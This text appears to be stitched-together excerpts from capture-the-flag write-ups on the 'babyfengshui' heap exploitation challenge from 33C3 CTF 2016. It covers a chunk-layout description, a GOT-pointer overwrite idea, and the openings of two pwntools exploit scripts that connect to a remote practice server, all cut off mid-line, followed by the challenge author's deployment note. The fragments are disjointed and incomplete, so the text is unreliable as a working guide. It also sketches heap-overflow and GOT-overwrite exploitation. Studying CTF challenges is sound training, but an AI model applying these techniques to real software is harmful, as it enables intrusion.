First a chunk is allocated for the description, then another chunk of size 0x80 is allocated, and the description chunk's pointer is stored in the second chunk. Next there is a pointer array *(&ptr+byte_804b069) that stores the second chunk. Then the get_name function is called to read the name: 124 bytes are read into the second chunk at offset 4. get_name scans the input name and, if it contains a 10, sets the ...
At the same time, by changing the pointer to the GOT table I can also gain write capability. So simple, and I didn't think of it; I'm impressed with myself.
exp:
from pwn import *
from LibcSearcher import *
local = 0
binary = "babyfengshui_33c3_2016"
libc_path = '../libc-2.23.so'
port = "27912"
if local == 1:
    p = process(binary)
else:
    p = remote("node3.buuoj.cn", port)
def dbg():...
3. Solution
exp:
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p = remote('', 25266)
#p = process('./babyfengshui_33c3_2016')
#p = process(["/root/glibc-all-in-one-master/libs/2.23-0ubuntu3_amd64/", './easyheap'], env={"LD_PRELOAD": "/root/glibc-all-in-one-mast...
This was a pwnable worth 150 pts that I wrote for the 33C3 CTF organised by Eat, Sleep, Pwn, Repeat. Every script used for the deployment of the challenge is included; you can just execute make clean && make all, then ./build_docker.sh && ./run_docker.sh ...